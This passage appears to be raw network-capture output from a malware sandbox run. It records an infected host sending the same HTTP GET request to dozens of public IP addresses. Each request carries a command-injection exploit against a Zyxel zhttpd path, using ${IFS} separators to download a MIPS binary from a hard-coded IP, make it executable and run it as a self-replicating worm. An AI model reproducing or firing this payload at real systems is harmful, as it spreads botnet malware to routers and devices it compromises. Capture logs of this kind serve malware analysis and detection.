                                            Jan 14, 2024 15:50:42.465039968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5146192.168.2.2334022196.65.131.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465055943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5147192.168.2.234365272.49.90.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465082884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5148192.168.2.235764872.175.223.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465142012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5149192.168.2.2353142194.66.154.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465177059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5150192.168.2.233537684.198.166.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465199947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5151192.168.2.2338460143.223.44.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465245008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5152192.168.2.234386250.214.5.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465270042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5153192.168.2.235814680.63.40.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465301037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5154192.168.2.2346808162.147.83.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465322971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5155192.168.2.236028219.177.142.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465346098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5156192.168.2.2356296146.245.248.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465377092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5157192.168.2.233942689.158.141.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465408087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5158192.168.2.234700878.147.16.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465441942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5159192.168.2.235479450.218.214.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465477943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5160192.168.2.234001669.149.42.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465504885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5161192.168.2.2343094183.226.155.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465552092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5162192.168.2.235608657.143.209.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465605021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5163192.168.2.233539814.53.132.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465620041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5164192.168.2.234442436.234.148.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465640068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5165192.168.2.234869682.135.81.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465662003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5166192.168.2.2352298168.68.212.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465681076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5167192.168.2.2356724182.86.219.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465718031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5168192.168.2.2334036203.201.93.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465742111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5169192.168.2.2354960141.73.222.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465754032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5170192.168.2.2350204173.85.160.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465754032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5171192.168.2.235515443.47.239.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465785027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5172192.168.2.2338950132.23.171.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465817928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5173192.168.2.2333652107.123.27.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465857983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5174192.168.2.2349180208.30.209.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465904951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5175192.168.2.2345916199.221.181.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465912104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5176192.168.2.2354500130.121.154.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465955019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5177192.168.2.2343986129.15.228.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.465977907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5178192.168.2.2333350218.24.162.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466032982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5179192.168.2.2336038167.61.10.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466033936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5180192.168.2.2357944168.128.59.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466063976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5181192.168.2.234862897.187.117.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466115952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5182192.168.2.2343142221.68.131.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466123104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5183192.168.2.2348344129.195.10.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466145992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5184192.168.2.235773061.41.160.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466165066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5185192.168.2.2337484162.215.12.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466218948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5186192.168.2.2358054212.198.187.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466248035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5187192.168.2.236034654.180.148.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466278076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5188192.168.2.2335726221.42.107.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466300964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5189192.168.2.2339950180.134.85.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466346025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5190192.168.2.23352762.240.167.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466362953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5191192.168.2.233818666.208.63.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466401100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5192192.168.2.235278662.216.179.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466439962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5193192.168.2.233747660.69.5.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466442108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5194192.168.2.2359304109.181.216.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466475010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5195192.168.2.2349734205.74.81.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466505051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5196192.168.2.234153491.95.237.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466531038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5197192.168.2.2354844220.109.205.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466552019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5198192.168.2.2338042176.129.230.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466573000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5199192.168.2.234245259.210.210.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466619015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5200192.168.2.235385893.41.173.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466650009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5201192.168.2.2340188219.22.139.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466687918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5202192.168.2.2357830204.11.55.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466707945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5203192.168.2.2352178174.228.103.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466739893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5204192.168.2.2339412219.140.180.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466768026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5205192.168.2.2346238130.226.106.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466801882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5206192.168.2.2340734130.244.183.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466821909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5207192.168.2.2334162187.141.87.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.466878891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5208192.168.2.2345986149.43.187.15443
                                            TimestampBytes transferredDirectionData
